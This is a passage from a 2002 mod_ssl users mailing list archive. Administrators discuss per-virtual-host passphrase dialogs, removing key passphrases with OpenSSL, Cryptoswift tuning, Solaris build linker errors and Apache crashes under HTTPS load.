performances ?

Best regards

Estrade Matthieu



________________________________________________________________
Etudiant: Wanadoo t'offre le Pack eXtense Haut Débit soit 150,92 euros d'économies !
Et pour 1 euro de plus, reçois le CD-ROM du jeu Dark Age of Camelot
+ 1 mois de jeu en réseau offert ! 
Clique ici : http://www.ifrance.com/_reloc/mail.etudiant 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 16 20:20:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA01737; Mon, 16 Sep 2002 20:19:52 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from forest.mmhosting.com id UAA01714; Mon, 16 Sep 2002 20:18:31 +0200 (MET DST)
Received: from rkukiela ([66.247.109.123])
	by onrampnetworks.com (8.10.2/8.10.2) with SMTP id g8GIS5x13138
	for ; Mon, 16 Sep 2002 13:28:05 -0500
Message-ID: <003d01c25dad$725f9fb0$0a01a8c0@rkukiela>
From: "Rick Kukiela" 
To: 
Subject: passphrasedialog help...
Date: Mon, 16 Sep 2002 13:18:23 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rick Kukiela" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Im running a server that has a lot of virtual hosts with ssl enabled on
them. The problem im having is that all of the servers have encrypted key
files and their own little passphrase dialog binary that ouputs the password
to stdout.

Here is what i did, I put this for every vhost with ssl:

# start ssl vhost for www.domain.com


SSLPassPhraseDialog exec:/websites/www.domain.com/www_ssl/phrase

NameVirtualHost 192.168.1.20:443

and so on and so on.

I looked in the log when the server startup failed and what it appears to be
doing is takeing the last occurance of the passphrasedialog line in the file
and using it for all the virtualhosts instead of using each passphrasedialog
for each virtual host. This process must be automated as i cannot sit here
and type in 40 to 60 passwords in everytime the server is loaded.

Please help me, I dont know what IM doing wrong but I need this to work.

TIA
Rick Kukiela

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 16 20:23:50 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA01856; Mon, 16 Sep 2002 20:22:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id UAA01825; Mon, 16 Sep 2002 20:21:41 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KMKVO13Z0000FT09@mdx.ac.uk> for modssl-users@modssl.org; Mon,
 16 Sep 2002 19:21:46 +0100 (BST)
Received: from mdx-nwsup1.nw.mdx.ac.uk (mdx-nwsup1.mdx.ac.uk [158.94.57.9])
 by mdx.ac.uk (PMDF V6.1-1 #38636) with ESMTP id <01KMKVO0GIUW00JMBJ@mdx.ac.uk>
 for modssl-users@modssl.org; Mon, 16 Sep 2002 19:21:45 +0100 (BST)
Received: from MDX-NWSUP1/SpoolDir by mdx-nwsup1.nw.mdx.ac.uk (Mercury 1.48)
 ; Mon, 16 Sep 2002 19:19:03 +0000
Received: from SpoolDir by MDX-NWSUP1 (Mercury 1.48); Mon,
 16 Sep 2002 19:19:02 +0000
Date: Mon, 16 Sep 2002 19:19:02 +0000
From: a.moon@mdx.ac.uk
Subject: passphrasedialog help...
To: modssl-users@modssl.org
Message-id: <150FDC84B5B@mdx-nwsup1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Due to unaviodable circumstances, I am away from the office until the Monday 30th September 2002 

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Kirsteen1, Sanjay1 or Jeff1
who should be able to help.

If the problem relates to mubsweb please contact sanjay1
If the probelm relates to OASIS or WebCT please contact Kirsteen1
If your query  relates to mbs1111 or it support please contact Jeff1

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 16 23:05:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA05211; Mon, 16 Sep 2002 22:55:47 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from clavin.efn.org id WAA05152; Mon, 16 Sep 2002 22:53:07 +0200 (MET DST)
Received: from garcia.efn.org (daemon@garcia.efn.org [66.178.136.5])
	by clavin.efn.org (8.11.6/8.11.6) with ESMTP id g8GKqxv13764
	for ; Mon, 16 Sep 2002 13:52:59 -0700 (PDT)
Received: from localhost (hbl@localhost)
	by garcia.efn.org (8.11.6/8.11.6) with ESMTP id g8GKqw526789
	for ; Mon, 16 Sep 2002 13:52:58 -0700 (PDT)
X-Authentication-Warning: garcia.efn.org: hbl owned process doing -bs
Date: Mon, 16 Sep 2002 13:52:56 -0700 (PDT)
From: Horst 
To: modssl-users@modssl.org
Subject: Re: passphrasedialog help...
In-Reply-To: <003d01c25dad$725f9fb0$0a01a8c0@rkukiela>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Horst 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am sure I am missing something, but if you have all passphrases
present on one machine you may as well have just one passphrase and
separate the VirtualHost and HAVE_SSL blocks from each other?

Also, not exactly the answer to you question/approach, but a consideration
may be removing all pass phrase(s) from the .../ssl.key/server.key 
 (if your machine is in a safe environment) by using something like:

	openssl rsa -in server.key -out server_wo.key

I recommend saving the keys before copying the server_wo.key to the *real*
location and file name, and practicing with openssl in a tmp directory.
 
 BTW, I have 50+ virtual domains protected by only *one* passphrase in
server.key .

Good luck ........................ Horst
http://www.modssl.org/docs/2.8/ssl_reference.html#ToC2


On Mon, 16 Sep 2002, Rick Kukiela wrote:

> Im running a server that has a lot of virtual hosts with ssl enabled on
> them. The problem im having is that all of the servers have encrypted key
> files and their own little passphrase dialog binary that ouputs the password
> to stdout.
> 
> Here is what i did, I put this for every vhost with ssl:
> 
> # start ssl vhost for www.domain.com
> 
> 
> SSLPassPhraseDialog exec:/websites/www.domain.com/www_ssl/phrase
> 
> NameVirtualHost 192.168.1.20:443
> 
> and so on and so on.
> 
> I looked in the log when the server startup failed and what it appears to be
> doing is takeing the last occurance of the passphrasedialog line in the file
> and using it for all the virtualhosts instead of using each passphrasedialog
> for each virtual host. This process must be automated as i cannot sit here
> and type in 40 to 60 passwords in everytime the server is loaded.
> 
> Please help me, I dont know what IM doing wrong but I need this to work.
> 
> TIA
> Rick Kukiela
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 16 23:43:34 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA06330; Mon, 16 Sep 2002 23:42:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtpzilla5.xs4all.nl id XAA06309; Mon, 16 Sep 2002 23:41:23 +0200 (MET DST)
Received: from a194-109-241-89.adsl.xs4all.nl (a194-109-241-89.adsl.xs4all.nl [194.109.241.89])
	by smtpzilla5.xs4all.nl (8.12.0/8.12.0) with SMTP id g8GL0SDp085066
	for ; Mon, 16 Sep 2002 23:00:33 +0200 (CEST)
Date: Mon, 16 Sep 2002 23:05:40 +0200
From: Jeroen Vriesman 
To: modssl-users@modssl.org
Subject: Re: passphrasedialog help...
Message-Id: <20020916230540.3317cd60.jeroen@experian.nl>
In-Reply-To: <003d01c25dad$725f9fb0$0a01a8c0@rkukiela>
References: <003d01c25dad$725f9fb0$0a01a8c0@rkukiela>
Organization: Dynaserv
X-Mailer: Sylpheed version 0.7.8claws (GTK+ 1.2.10; )
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeroen Vriesman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Strange that it only seems to accept one exec: ...phrase for all the virtual hosts.

This is what I would do:

Make an expect script which reads the name of the virtual host the server is asking the password for, and make it execute the right ¨prhase¨ executable (or read it from a file), and make it reply to the servers request.
Then start the server with the expect script.

For safety you could encrypt the file with the key passwords and make the expect script ask for one password.
 


On Mon, 16 Sep 2002 13:18:23 -0500
"Rick Kukiela"  wrote:

> Im running a server that has a lot of virtual hosts with ssl enabled on
> them. The problem im having is that all of the servers have encrypted key
> files and their own little passphrase dialog binary that ouputs the password
> to stdout.
> 
> Here is what i did, I put this for every vhost with ssl:
> 
> # start ssl vhost for www.domain.com
> 
> 
> SSLPassPhraseDialog exec:/websites/www.domain.com/www_ssl/phrase
> 
> NameVirtualHost 192.168.1.20:443
> 
> and so on and so on.
> 
> I looked in the log when the server startup failed and what it appears to be
> doing is takeing the last occurance of the passphrasedialog line in the file
> and using it for all the virtualhosts instead of using each passphrasedialog
> for each virtual host. This process must be automated as i cannot sit here
> and type in 40 to 60 passwords in everytime the server is loaded.
> 
> Please help me, I dont know what IM doing wrong but I need this to work.
> 
> TIA
> Rick Kukiela
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 16 23:55:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA06794; Mon, 16 Sep 2002 23:54:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from irvexch1.rainbow.com id XAA06786; Mon, 16 Sep 2002 23:53:27 +0200 (MET DST)
Received: by IRVEXCH1 with Internet Mail Service (5.5.2653.19)
	id ; Mon, 16 Sep 2002 14:41:00 -0700
Message-ID: <5606C687D4C7D5119A5800508BF30DB401C04867@IRVEXCH1>
From: Lynn Gazis 
To: "'modssl-users@modssl.org'" 
Subject: RE: Cryptoswift + apache 2.0
Date: Mon, 16 Sep 2002 14:40:59 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id XAA06789
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lynn Gazis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Using the shmcb session cache and minimizing logging as much as possible are
the two things I can think of right away.

Lynn Gazis

-----Original Message-----
From: Estrade Matthieu [mailto:estrade-m@ifrance.com]
Sent: Monday, September 16, 2002 3:03 AM
To: modssl-users@modssl.org
Subject: Cryptoswift + apache 2.0


Hi,

I'am searching the best directives for apache 2.0 and Cryptoswift.
is anyone get optimized directives with which he do really good 
performances ?

Best regards

Estrade Matthieu



________________________________________________________________
Etudiant: Wanadoo t'offre le Pack eXtense Haut Débit soit 150,92 euros
d'économies !
Et pour 1 euro de plus, reçois le CD-ROM du jeu Dark Age of Camelot
+ 1 mois de jeu en réseau offert ! 
Clique ici : http://www.ifrance.com/_reloc/mail.etudiant 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 17 00:19:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA07812; Tue, 17 Sep 2002 00:18:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id AAA07800; Tue, 17 Sep 2002 00:17:57 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Mon, 16 Sep 2002 15:16:51 -0700
Received: from 204.115.33.49 by lw7fd.law7.hotmail.msn.com with HTTP;
	Mon, 16 Sep 2002 22:16:51 GMT
X-Originating-IP: [204.115.33.49]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
Date: Mon, 16 Sep 2002 22:16:51 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 16 Sep 2002 22:16:51.0768 (UTC) FILETIME=[C1E87B80:01C25DCE]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I am looking for the following file:


Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip


in the     http://www.modssl.org/contrib/ftp/contrib/       folder.


If anyone could contribute this file, i would highly appreciate it.

Thanks and Regards,

Bye,
-Jim.



_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 17 04:33:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA13748; Tue, 17 Sep 2002 04:32:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from kathmandu.sun.com id EAA13735; Tue, 17 Sep 2002 04:31:23 +0200 (MET DST)
Received: from esunmail ([129.147.58.121])
	by kathmandu.sun.com (8.9.3+Sun/8.9.3) with ESMTP id UAA03599
	for ; Mon, 16 Sep 2002 20:31:22 -0600 (MDT)
Received: from xpa-fe1 ([129.147.58.121]) by edgemail1.Central.Sun.COM
 (iPlanet Messaging Server 5.2 HotFix 0.8 (built Jul 12 2002))
 with ESMTP id <0H2K008NX9OAP1@edgemail1.Central.Sun.COM> for
 modssl-users@modssl.org; Mon, 16 Sep 2002 20:31:22 -0600 (MDT)
Received: from sun.com ([62.31.66.69])
 by mail.sun.net (iPlanet Messaging Server 5.2 HotFix 0.2 (built Apr 26 2002))
 with ESMTPSA id <0H2K00MVS9O84A@mail.sun.net> for modssl-users@modssl.org;
 Mon, 16 Sep 2002 20:31:22 -0600 (MDT)
Date: Tue, 17 Sep 2002 03:28:19 +0100
From: Graham Stewart 
Subject: Problems compiling on solaris 8
To: modssl-users@modssl.org
Message-id: <3D869343.8000801@sun.com>
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii; format=flowed
Content-transfer-encoding: 7BIT
X-Accept-Language: en-us, en, ja
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc2)
 Gecko/20020510
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Graham Stewart 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm currently trying to build OpenSSL 0.9.6g, Mod_ssl 2.8.10 and Apache 
1.3.26 (with Mod_perl 1.26 in there too) - all statically linked.

I carried this out with OpenSSL 0.9.6b a few weeks ago and it worked 
fine and now that i've updated openssl I get hundreds of errors 
compiling apache. Since the new openssl itself works my hunch would be 
that something has gone awry in the mod_ssl process.

I've attached a little piece of my log in the hope that somebody has 
seen this problem and might know how to solve it.

Graham



....
<=== src/modules/ssl
<=== src/modules
gcc -c  -I./os/unix -I./include   -DSOLARIS2=280 -DMOD_SSL=208110 -DEAPI 
-DUSE_EXPAT -I./lib/expat-lite -DNO_DL_NEEDED `./apaci` modules.c
gcc -c  -I./os/unix -I./include   -DSOLARIS2=280 -DMOD_SSL=208110 -DEAPI 
-DUSE_EXPAT -I./lib/expat-lite -DNO_DL_NEEDED `./apaci` buildmark.c
gcc  -DSOLARIS2=280 -DMOD_SSL=208110 -DEAPI -DUSE_EXPAT 
-I./lib/expat-lite -DNO_DL_NEEDED `./apaci` 
-L/usr/local/src/openssl-0.9.6g   \
       -o httpd buildmark.o modules.o  modules/ssl/libssl.a 
modules/standard/libstandard.a  main/libmain.a  ./os/unix/libos.a 
ap/libap.a  lib/expat-lite/libexpat.a  -lsocket -lnsl -lpthread  -lssl 
-lcrypto
modules/ssl/libssl.a(ssl_engine_init.o): In function `ssl_init_SSLLibrary':
ssl_engine_init.o(.text+0x590): undefined reference to 
`SSL_load_error_strings'
ssl_engine_init.o(.text+0x598): undefined reference to `SSL_library_init'
ssl_engine_init.o(.text+0x5a8): undefined reference to 
`X509V3_add_standard_extensions'
modules/ssl/libssl.a(ssl_engine_init.o): In function 
`ssl_init_TmpKeysHandle':
ssl_engine_init.o(.text+0x648): undefined reference to `RSA_generate_key'
ssl_engine_init.o(.text+0x6a8): undefined reference to `i2d_RSAPrivateKey'
ssl_engine_init.o(.text+0x6ec): undefined reference to `i2d_RSAPrivateKey'
ssl_engine_init.o(.text+0x6f8): undefined reference to `RSA_free'
ssl_engine_init.o(.text+0x714): undefined reference to `RSA_generate_key'
ssl_engine_init.o(.text+0x774): undefined reference to `i2d_RSAPrivateKey'
ssl_engine_init.o(.text+0x7b8): undefined reference to `i2d_RSAPrivateKey'
ssl_engine_init.o(.text+0x7c4): undefined reference to `RSA_free'
ssl_engine_init.o(.text+0x848): undefined reference to `i2d_DHparams'
ssl_engine_init.o(.text+0x88c): undefined reference to `i2d_DHparams'
ssl_engine_init.o(.text+0x898): undefined reference to `DH_free'
ssl_engine_init.o(.text+0x904): undefined reference to `i2d_DHparams'
ssl_engine_init.o(.text+0x948): undefined reference to `i2d_DHparams'
ssl_engine_init.o(.text+0x954): undefined reference to `DH_free'
ssl_engine_init.o(.text+0x9d4): undefined reference to `d2i_RSAPrivateKey'
ssl_engine_init.o(.text+0xa58): undefined reference to `d2i_RSAPrivateKey'
ssl_engine_init.o(.text+0xaf4): undefined reference to `d2i_DHparams'
ssl_engine_init.o(.text+0xb78): undefined reference to `d2i_DHparams'
ssl_engine_init.o(.text+0xbe8): undefined reference to `RSA_free'
ssl_engine_init.o(.text+0xc14): undefined reference to `RSA_free'
ssl_engine_init.o(.text+0xc40): undefined reference to `DH_free'
ssl_engine_init.o(.text+0xc6c): undefined reference to `DH_free'
modules/ssl/libssl.a(ssl_engine_init.o): In function 
`ssl_init_ConfigureServer':
ssl_engine_init.o(.text+0xe84): undefined reference to `SSLv2_server_method'
ssl_engine_init.o(.text+0xe94): undefined reference to `SSL_CTX_new'
ssl_engine_init.o(.text+0xea8): undefined reference to 
`SSLv23_server_method'
ssl_engine_init.o(.text+0xeb8): undefined reference to `SSL_CTX_new'
ssl_engine_init.o(.text+0xed8): undefined reference to `SSL_CTX_ctrl'
ssl_engine_init.o(.text+0xf08): undefined reference to `SSL_CTX_ctrl'
ssl_engine_init.o(.text+0xf38): undefined reference to `SSL_CTX_ctrl'
ssl_engine_init.o(.text+0xf68): undefined reference to `SSL_CTX_ctrl'
ssl_engine_init.o(.text+0xf7c): undefined reference to `SSL_CTX_set_ex_data'
ssl_engine_init.o(.text+0xfa0): undefined reference to `SSL_CTX_ctrl'
ssl_engine_init.o(.text+0xfcc): undefined reference to `SSL_CTX_ctrl'
......


the error messages continue

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 17 05:03:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA14194; Tue, 17 Sep 2002 05:02:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pimout3-ext.prodigy.net id FAA14188; Tue, 17 Sep 2002 05:02:01 +0200 (MET DST)
Received: from MAUCHI (adsl-66-136-203-103.dsl.austtx.swbell.net [66.136.203.103])
	by pimout3-ext.prodigy.net (8.12.3 da nor stuldap/8.12.3) with SMTP id g8H31wGT507836
	for ; Mon, 16 Sep 2002 23:01:59 -0400
Message-ID: <05e801c25df6$9a11c8f0$0100a8c0@MAUCHI>
From: "Ivelin Ivanov" 
To: 
Subject: SSL Problem Under High Load with Apache-2.0.39-Mod_SSL-OpenSSL-0.9.6d-Win32 
Date: Mon, 16 Sep 2002 22:02:04 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ivelin Ivanov" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Dear mod_ssl group,

We have been trying to use in production the precompiled Apache with mod_ssl
from the precompiled version in the contrib directory:
http://www.modssl.org/contrib/ftp/contrib/Apache-2.0.39-Mod_SSL-OpenSSL-0.9.
6d-Win32.zip


It behaves very stable over weeks and performs nice under heavy http load.

However when we run load tests over https, the server breaks after a day or
two.
All the log files look normal until the time of the crash.
Only the error.log suggests problems. I have attached it below.

Our system is Windows 2000 Professional with 1G RAM, 2 Intel CPUs.

Appears that when run under load against https URLs, the server gets
overloaded and restarts every few hours.

We are now running it again and collecting CPU and memory parameters over
time, which I can provide if requested.


Your help will be appreciated,


Best regards,


-= Ivelin =-

error.log excerpt:
-------------------

[Tue Sep 10 17:02:40 2002] [notice] Parent: Created child process 2056
[Tue Sep 10 17:02:42 2002] [notice] Child 2056: Child process is running
[Tue Sep 10 17:02:42 2002] [notice] Child 2056: Acquired the start mutex.
[Tue Sep 10 17:02:42 2002] [notice] Child 2056: Starting 450 worker threads.
[Tue Sep 10 17:03:17 2002] [notice] Parent: Received shutdown signal --
Shutting down the server.
[Tue Sep 10 17:03:17 2002] [notice] Child 2056: Exit event signaled. Child
process is ending.
[Tue Sep 10 17:03:18 2002] [notice] Child 2056: Released the start mutex
[Tue Sep 10 17:03:19 2002] [notice] Child 2056: Waiting for 450 worker
threads to exit.
[Tue Sep 10 17:03:19 2002] [notice] Child 2056: All worker threads have
exited.
[Tue Sep 10 17:03:19 2002] [notice] Child 2056: Child process is exiting
[Tue Sep 10 17:03:19 2002] [notice] Parent: Child process exited
successfully.
[Tue Sep 10 17:04:49 2002] [notice] Parent: Created child process 2056
[Tue Sep 10 17:04:53 2002] [notice] Child 2056: Child process is running
[Tue Sep 10 17:04:53 2002] [notice] Child 2056: Acquired the start mutex.
[Tue Sep 10 17:04:53 2002] [notice] Child 2056: Starting 450 worker threads.
[Wed Sep 11 01:34:28 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Wed Sep 11 01:34:32 2002] [notice] Parent: Created child process 3292
[Wed Sep 11 01:34:34 2002] [notice] Child 3292: Child process is running
[Wed Sep 11 01:34:34 2002] [notice] Child 3292: Acquired the start mutex.
[Wed Sep 11 01:34:34 2002] [notice] Child 3292: Starting 450 worker threads.
[Wed Sep 11 04:13:11 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Wed Sep 11 04:13:12 2002] [notice] Parent: Created child process 3496
[Wed Sep 11 04:13:14 2002] [notice] Child 3496: Child process is running
[Wed Sep 11 04:13:14 2002] [notice] Child 3496: Acquired the start mutex.
[Wed Sep 11 04:13:14 2002] [notice] Child 3496: Starting 450 worker threads.
[Wed Sep 11 10:01:43 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Wed Sep 11 10:01:44 2002] [notice] Parent: Created child process 2556
[Wed Sep 11 10:01:47 2002] [notice] Child 2556: Child process is running
[Wed Sep 11 10:01:47 2002] [notice] Child 2556: Acquired the start mutex.
[Wed Sep 11 10:01:47 2002] [notice] Child 2556: Starting 450 worker threads.
[Wed Sep 11 14:42:06 2002] [notice] Parent: Received shutdown signal --
Shutting down the server.
[Wed Sep 11 14:42:06 2002] [notice] Child 2556: Exit event signaled. Child
process is ending.
[Wed Sep 11 14:42:07 2002] [notice] Child 2556: Released the start mutex
[Wed Sep 11 14:42:08 2002] [notice] Child 2556: Waiting for 450 worker
threads to exit.
[Wed Sep 11 14:42:08 2002] [notice] Child 2556: All worker threads have
exited.
[Wed Sep 11 14:42:08 2002] [notice] Child 2556: Child process is exiting
[Wed Sep 11 14:42:08 2002] [notice] Parent: Child process exited
successfully.
[Wed Sep 11 14:42:23 2002] [notice] Parent: Created child process 3840
[Wed Sep 11 14:42:24 2002] [notice] Child 3840: Child process is running
[Wed Sep 11 14:42:24 2002] [notice] Child 3840: Acquired the start mutex.
[Wed Sep 11 14:42:24 2002] [notice] Child 3840: Starting 450 worker threads.
[Wed Sep 11 15:02:29 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Wed Sep 11 15:02:30 2002] [notice] Parent: Created child process 3460
[Wed Sep 11 15:02:32 2002] [notice] Child 3460: Child process is running
[Wed Sep 11 15:02:32 2002] [notice] Child 3460: Acquired the start mutex.
[Wed Sep 11 15:02:32 2002] [notice] Child 3460: Starting 450 worker threads.
[Wed Sep 11 21:20:43 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Wed Sep 11 21:20:44 2002] [notice] Parent: Created child process 1856
[Wed Sep 11 21:20:46 2002] [notice] Child 1856: Child process is running
[Wed Sep 11 21:20:46 2002] [notice] Child 1856: Acquired the start mutex.
[Wed Sep 11 21:20:46 2002] [notice] Child 1856: Starting 450 worker threads.
[Wed Sep 11 21:36:56 2002] [notice] Parent: Created child process 3852
[Wed Sep 11 21:36:58 2002] [notice] Child 3852: Child process is running
[Wed Sep 11 21:36:58 2002] [notice] Child 3852: Acquired the start mutex.
[Wed Sep 11 21:36:58 2002] [notice] Child 3852: Starting 450 worker threads.
[Thu Sep 12 00:16:36 2002] [warn] Server ran out of threads to serve
requests. Consider raising the ThreadsPerChild setting
[Thu Sep 12 19:34:04 2002] [notice] Parent: Received shutdown signal --
Shutting down the server.
[Thu Sep 12 19:34:04 2002] [notice] Child 3852: Exit event signaled. Child
process is ending.
[Thu Sep 12 19:34:34 2002] [notice] Parent: Forcing termination of child
process 272
[Thu Sep 12 19:34:43 2002] [notice] Parent: Created child process 2452
[Thu Sep 12 19:34:44 2002] [notice] Child 2452: Child process is running
[Thu Sep 12 19:34:44 2002] [notice] Child 2452: Acquired the start mutex.
[Thu Sep 12 19:34:44 2002] [notice] Child 2452: Starting 450 worker threads.
[Fri Sep 13 00:03:45 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Fri Sep 13 00:03:47 2002] [notice] Parent: Created child process 992
[Fri Sep 13 00:03:48 2002] [notice] Child 992: Child process is running
[Fri Sep 13 00:03:48 2002] [notice] Child 992: Acquired the start mutex.
[Fri Sep 13 00:03:49 2002] [notice] Child 992: Starting 450 worker threads.
[Fri Sep 13 02:08:49 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Fri Sep 13 02:08:51 2002] [notice] Parent: Created child process 4376
[Fri Sep 13 02:08:53 2002] [notice] Child 4376: Child process is running
[Fri Sep 13 02:08:53 2002] [notice] Child 4376: Acquired the start mutex.
---->[Fri Sep 13 02:08:53 2002] [notice] Child 4376: Starting 450 worker
threads.
[Fri Sep 13 02:10:45 2002] [warn] Server ran out of threads to serve
requests. Consider raising the ThreadsPerChild setting
[Fri Sep 13 17:05:10 2002] [notice] Parent: child process exited with status
1 -- Restarting.
[Fri Sep 13 17:05:11 2002] [notice] Parent: Created child process 4060
[Fri Sep 13 17:05:13 2002] [notice] Child 4060: Child process is running
[Fri Sep 13 17:05:13 2002] [notice] Child 4060: Acquired the start mutex.
[Fri Sep 13 17:05:13 2002] [notice] Child 4060: Starting 450 worker threads.
[Fri Sep 13 17:07:23 2002] [notice] Parent: Created child process 4400
[Fri Sep 13 17:07:25 2002] [notice] Child 4400: Child process is running
[Fri Sep 13 17:07:25 2002] [notice] Child 4400: Acquired the start mutex.
[Fri Sep 13 17:07:25 2002] [notice] Child 4400: Starting 450 worker threads.
